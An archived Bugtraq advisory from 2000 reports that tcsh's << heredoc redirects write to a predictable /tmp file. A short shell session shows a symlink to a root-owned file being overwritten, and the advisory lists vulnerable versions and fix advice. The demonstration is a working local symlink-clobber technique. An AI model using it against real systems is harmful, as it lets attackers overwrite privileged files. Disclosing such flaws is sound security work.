[17407] in bugtraq
tcsh: unsafe tempfile in << redirects
daemon@ATHENA.MIT.EDU (proton)
Mon Oct 30 01:26:48 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <39FBAAF7.D4F258A4@energymech.net>
Date: Sun, 29 Oct 2000 04:43:35 +0000
Reply-To: proton <proton@ENERGYMECH.NET>
From: proton <proton@ENERGYMECH.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
PROBLEM:
/tmp# echo 'hello world' > rootfile
/tmp# chmod 600 rootfile
/tmp# ln -s rootfile sh$$
/tmp# chown -h 666.666 sh$$
/tmp# ls -l rootfile sh$$
-rw------- 1 root root 12 Oct 29 03:55 rootfile
lrwxrwxrwx 1 666 666 8 Oct 29 03:56 sh12660 ->
rootfile
/tmp# cat <<BAR
? FOO
? BAR
FOO
o world
/tmp# ls -l rootfile sh$$
/bin/ls: sh12660: No such file or directory
-rw------- 1 root root 12 Oct 29 03:56 rootfile
/tmp# cat rootfile
FOO
o world
/tmp#
VULNERABLE VERSIONS:
6.07.02 (Astron) 1996-10-27
6.08.00 (Astron) 1998-10-02
6.09.00 (Astron) 1999-08-16 (latest)
(no other versions tested)
FIX:
make sure root (and other sensitive user accounts) doesnt have any
predictable jobs (cron, ~/.cshrc, ...) that uses tcsh AND `<<'
redirects.
patch the source somehow..
(available at ftp://ftp.astron.com/pub/tcsh/ )
/proton
